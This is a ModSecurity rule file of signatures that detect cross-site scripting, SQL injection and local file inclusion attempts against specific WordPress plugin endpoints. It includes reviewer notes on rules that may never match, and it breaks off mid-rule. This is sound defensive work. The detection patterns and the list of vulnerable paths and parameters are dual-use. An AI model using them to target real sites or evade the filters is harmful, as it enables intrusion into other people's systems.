# (2012009) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt
# Chain: request line contains the handler_image.php path AND the i parameter
# matches the keyword pattern.
# NOTE(review): same caveat as 2011107 - the pattern requires the literal "i="
# inside the value of ARGS:i. Confirm with a test request.
SecRule REQUEST_LINE "@contains /plugins/feedlist/handler_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012009,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
    SecRule ARGS:i "(?i:i\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012072) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt
# Chain: request line contains the wp-safe-search-jx.php path AND the v1
# parameter matches the keyword pattern.
# NOTE(review): same caveat as 2011107 - the pattern requires the literal "v1="
# inside the value of ARGS:v1. Confirm with a test request.
SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012072,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
    SecRule ARGS:v1 "(?i:v1\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /plugins/accept-signups/accept-signups_submit.php"
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012164,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:email "(?i:email\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/audio/getid3/demos/demo.browse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012353,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:showfile "(?i:showfile\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012356) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /js/modalbox/tests/functional/_ajax_method_get.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012356,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:param "(?i:param\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012407,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains /options-runnow-iframe.php?wpabs=/" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012408,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains 
/options-view_log-iframe.php?wpabs=/" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&logfile\=\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"
# NOTE(review): the rule above is the last link of chain 2012408. It lists no t:
# actions of its own and QUERY_STRING is exposed without URL decoding, so a
# "%00" in the raw query string would match only if decoding from the chain
# starter also applies to chained rules - confirm. Also verify how "\\x00" is
# unescaped by the config parser (NUL byte vs. the literal text "\x00").

# (2012411) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt
# Chain: request line contains the updateAJAX.php path AND the post_id parameter
# matches the keyword pattern. On a full match the critical anomaly score is
# added to tx.anomaly_score and the matched variable is recorded in a TX entry.
# NOTE(review): ARGS:post_id holds the parameter value only, yet the pattern
# requires the literal "post_id=" before the keyword, so a plain payload in
# post_id may not match. Looks like a carry-over from a URI-based signature -
# confirm with a test request.
SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012411,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
    SecRule ARGS:post_id "(?i:post_id\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012412) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id SELECT
# Chain: request line contains the updateAJAX.php path AND the post_id value
# contains SELECT followed later by FROM (case-insensitive).
SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012412,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id SELECT',tag:'web-application-attack'"
    SecRule ARGS:post_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL
Injection Attempt updateAJAX.php post_id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012413) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UNION SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012413,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UNION SELECT',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012414) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id INSERT SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012414,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id INSERT',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id 
DELETE SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012415,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id DELETE',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012416) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id ASCII SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012416,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id ASCII',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012417,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id 
UPDATE',tag:'web-application-attack'"
    SecRule ARGS:post_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# Shape shared by the rules below: each is a ModSecurity chain. The chain
# starter carries the metadata (id, rev, msg, tag, severity) and `block`; the
# last link carries the setvar actions. Every link must match. On a full match
# the last link adds tx.critical_anomaly_score to tx.anomaly_score, stores the
# message in tx.msg and records the matched variable under
# tx.<rule id>-WEB_ATTACK/WORDPRESS-<matched variable name>.

# (2012426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt
# Links: (1) request line contains the cloner.cron.php plugin path,
# (2) request line contains "GET ", (3) ARGS:config contains "../".
# NOTE(review): link 2 confines the rule to request lines containing "GET ".
# If the endpoint also reads `config` from requests sent with another method,
# this rule does not inspect them -- confirm, and drop the method test if so.
# NOTE(review): the t: transformations are declared on the chain starter only.
# Whether they also apply to ARGS:config depends on how the deployed
# ModSecurity version treats chained rules, and t:normalisePathWin normalises
# directory references, which matters for a "../" test -- verify with a
# regression request.
SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt
# Links: (1) request line contains the index2.php plugin path, (2) request
# line contains "task=dologin", (3) ARGS:option matches the pattern.
# NOTE(review): ARGS:option is matched against the parameter's value, yet the
# pattern starts with the literal text "option=" (\x3d is "="). As written it
# can only match when the value itself contains "option=" followed by one of
# the keywords. This looks like a leftover from a URI-based source signature
# -- confirm, then either match the keyword list directly or test a variable
# that still contains the parameter name. Rule 2012429 below is built the
# same way.
# NOTE(review): the keywords are plain substrings with no word boundary, so
# ordinary words containing "script" satisfy that part of the pattern; tighten
# it before loosening the prefix, or expect false positives in blocking mode.
SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012428,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'"
    SecRule REQUEST_LINE "@contains task=dologin" "chain"
    SecRule ARGS:option "(?i:option\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt
# Links: (1) request line contains the index2.php plugin path,
# (2) ARGS:mosmsg matches the pattern. The pattern requires the literal
# "mosmsg=" inside the parameter value (see the note on rule 2012428).
SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012429,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'"
    SecRule ARGS:mosmsg "(?i:mosmsg\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic SELECT
# Links: (1) request line contains the forum-server feed.php path,
# (2) ARGS:topic contains SELECT followed, after at least one character, by
# FROM (case-insensitive). The action list of link 2 continues on the next
# line of the file.
# NOTE(review): this is a keyword-pair signature for one published vector; it
# complements, and does not replace, the generic SQL injection rules or
# patching/removing the plugin.
SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012431,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic SELECT',tag:'web-application-attack'"
    SecRule ARGS:topic "(?i:SELECT.+FROM)"
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UNION SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012432,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UNION SELECT',tag:'web-application-attack'" SecRule ARGS:topic "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic INSERT SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic INSERT',tag:'web-application-attack'" SecRule ARGS:topic "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012434) SpiderLabs Research (SLR) Public Vulns: ET 
WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic DELETE SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012434,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic DELETE',tag:'web-application-attack'" SecRule ARGS:topic "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012435) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic ASCII SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012435,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic ASCII',tag:'web-application-attack'" SecRule ARGS:topic "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012436,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server 
wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',tag:'web-application-attack'" SecRule ARGS:topic "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/zotpress/zotpress.image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012437,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:citation "(?i:citation\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012476) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/folder.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012476,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:type 
"(?i:type\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012477) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012477,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id SELECT',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012478) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UNION SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012478,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UNION SELECT',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection 
